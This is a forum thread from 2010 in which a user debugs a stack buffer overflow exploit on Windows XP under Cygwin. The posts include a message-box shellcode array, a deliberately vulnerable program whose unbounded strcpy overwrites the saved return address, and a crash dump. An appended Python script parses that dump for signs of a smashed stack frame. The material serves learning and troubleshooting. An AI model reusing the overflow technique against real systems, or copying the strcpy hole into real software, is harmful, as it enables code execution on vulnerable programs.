[Win XP Pro SP3/Cygwin] Payload/shellcode not executing

Networking/Security Forums -> Programming and More

Author: draggy PostPosted: Mon Sep 06, 2010 7:16 am    Post subject: [Win XP Pro SP3/Cygwin] Payload/shellcode not executing
    ----
Hello people,

The payload/shellcode that resides in my array won't execute, or hangs, after the saved EIP on the stack was overwritten with the array address.

Here is my payload, which basically displays a message box:

msgbox.c:

Code:

#include <stdio.h>
#include <string.h>   /* strlen() */

/* Payload bytes as posted (displays a message box). */
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
                   "\x51\x68\x6c\x6c\x20\x20\x68\x33"
                   "\x32\x2e\x64\x68\x75\x73\x65\x72"
                   "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
                   "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
                   "\xc1\x11\x11\x11\x11\x51\x68\x61"
                   "\x67\x65\x42\x68\x4d\x65\x73\x73"
                   "\x89\xe1\x51\x50\xbb\x40\xae\x80"
                   "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
                   "\x51\x51\x52\xff\xd0\x31\xc0\x50"
                   "\xb8\x12\xcb\x81\x7c\xff\xd0";

int main(void)
{
   int (*func)();

   /* Treat the array's bytes as code and call into it. */
   func = (int (*)()) shellcode;
   printf("Shellcode Length is : %d\n", (int) strlen(shellcode));
   printf("Shellcode sizeof is : %d\n", (int) (sizeof(shellcode) / sizeof(char)));
   (*func)();

   return 0;
}


Here is the problem:

vul.c:

Code:

#include <stdio.h>
#include <stdlib.h>
#include <io.h>
#include <string.h>

/* Payload bytes as posted, followed by the bytes that land on the saved EBP
   and saved EIP when the whole array is copied into function2()'s 87-byte
   buffer c (one string literal, concatenated by the compiler). */
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
                   "\x51\x68\x6c\x6c\x20\x20\x68\x33"
                   "\x32\x2e\x64\x68\x75\x73\x65\x72"
                   "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
                   "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
                   "\xc1\x11\x11\x11\x11\x51\x68\x61"
                   "\x67\x65\x42\x68\x4d\x65\x73\x73"
                   "\x89\xe1\x51\x50\xbb\x40\xae\x80"
                   "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
                   "\x51\x51\x52\xff\xd0\x31\xc0\x50"
                   "\xb8\x12\xcb\x81\x7c\xff\xd0"
                   "BBBB"               /* overwrite saved EBP */
                   "\xd1\xcc\x22\x00";  /* overwrite saved EIP with function2()'s c array address */

void function2(void)
{
   char c[87];

   printf("Address c = %p and value = %x\n", (void *) (&c[0]), c[0]);

   /* Unbounded copy: shellcode is longer than c, so the saved EBP/EIP get overwritten. */
   strcpy(c, shellcode);
}

int main(void)
{
   printf("function 2 address = %p\n", (void *) (function2));

   function2();

   return 0;
}


and the undesired output:

Code:

$ uname -a
CYGWIN_NT-5.1 changeme 1.7.7(0.230/5/3) 2010-08-31 09:58 i686 Cygwin

$ ./vul
function 2 address = 0x4011a0
Address c = 0x22ccd1 and value = 1d
Segmentation fault (core dumped)

$ cat vul.exe.stackdump
Exception: STATUS_ACCESS_VIOLATION at eip=0022CCF3
eax=7E410000 ebx=7C801D7B ecx=7C801BFA edx=00240608 esi=00000000 edi=0022CE64
ebp=42424242 esp=0022CD20 program=C:\exploit\vul\vul.exe, pid 924, thread main
cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
Stack trace:
Frame     Function  Args
      3 [main] vul 924 exception::handle: Error while dumping state (probably corrupted stack)


Is Data Execution Prevention (DEP) on Windows XP Pro SP3 preventing the payload from executing after EIP has been overwritten with function2()'s "c" array address in the Cygwin environment?

Author: draggy PostPosted: Mon Sep 06, 2010 5:59 pm    Post subject:
    ----
Update:

Turning DEP off and on doesn't help in this situation.

I found that when I overwrite the saved EIP with the address of the global variable "shellcode", the payload/shellcode executes completely.

I wonder why it was not working when I overwrote the saved EIP with the address of function2's local variable "c".

Thanks

Author: alt.don PostPosted: Mon Sep 06, 2010 10:41 pm    Post subject:
    ----
Hello draggy,

There are many variables at play here which could have affected one lab test over another. I would suggest you write exactly what your lab environment was and we can then help troubleshoot it somewhat better.

--Don

Author: Fire Ant    Location: London    PostPosted: Tue Sep 07, 2010 9:16 am    Post subject:
    ----
draggy,

Did you check out the error message? It seems you have overwritten EBX rather than EIP.

eip=0022CCF3
ebp=42424242

Fire Ant

Author: draggy PostPosted: Tue Sep 07, 2010 11:20 am    Post subject:
    ----
Hello Don and Fireant,

Thank you for replying and coming to my aid :D

Hello Don,

The program was developed and tested in a virtual machine environment (VMware x86, 32-bit), Cygwin v1.7.7 under Windows XP Pro SP3. By the way, AVG (anti-virus) is installed.

Hello Fireant,

ebp=42424242 == "\x42\x42\x42\x42" == "BBBB", right? (ASCII table)

eip=0022CCF3 -> "\xd1\xcc\x22\x00" == 0022CCD1 -> 0022CCF3 - 0022CCD1 = 0x22 (34 bytes in decimal)

This means the shellcode executed for 33/34 bytes from 0x0022CCD1 (function2's local "c" array address) and then it stopped, plus it dumped core.

Thanks
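As an added example, not code from the thread: a small triage script that parses the Cygwin stackdump posted above and flags the usual signs of a smashed frame, using the c array address (0x22CCD1) and size (87) from the posts. The dump text is a constructed copy of the posted register lines, and the function names are my own.

```python
import re

# Constructed copy of the register lines from the stackdump posted in the thread.
STACKDUMP = r"""
Exception: STATUS_ACCESS_VIOLATION at eip=0022CCF3
eax=7E410000 ebx=7C801D7B ecx=7C801BFA edx=00240608 esi=00000000 edi=0022CE64
ebp=42424242 esp=0022CD20 program=C:\exploit\vul\vul.exe, pid 924, thread main
cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
"""

# Matches the 32-bit general registers Cygwin prints as name=XXXXXXXX.
REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|ebp|esp|eip)=([0-9A-Fa-f]{8})\b")


def parse_registers(dump):
    """Return {register: int} for the e?? registers found in a Cygwin stackdump."""
    return {name: int(value, 16) for name, value in REG_RE.findall(dump)}


def is_fill_pattern(value):
    """True when all four bytes of a 32-bit value are the same non-zero byte (0x42424242)."""
    b = value.to_bytes(4, "little")
    return b[0] != 0 and len(set(b)) == 1


def triage(dump, buf_addr, buf_len):
    """Flag signs that the stack buffer at buf_addr (buf_len bytes) was overflowed
    and that control was transferred into it. Returns a dict of findings."""
    regs = parse_registers(dump)
    buf_end = buf_addr + buf_len
    in_buf = lambda a: buf_addr <= a < buf_end
    return {
        # Saved EBP replaced by one repeated byte is the signature of a fill pattern.
        "ebp_fill_pattern": is_fill_pattern(regs["ebp"]),
        # Faulting EIP inside a stack buffer: code ran from the overflowed array.
        "eip_in_buffer": in_buf(regs["eip"]),
        # How far into the buffer execution got (0x22 == 34 for the posted dump).
        "eip_offset": regs["eip"] - buf_addr if in_buf(regs["eip"]) else None,
        # ESP still inside the buffer: the buffer is live stack, so any pushes and
        # calls made after the fault path began wrote over the buffer's own bytes.
        "esp_in_buffer": in_buf(regs["esp"]),
    }


if __name__ == "__main__":
    for key, val in triage(STACKDUMP, 0x22CCD1, 87).items():
        print(f"{key}: {val}")
```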


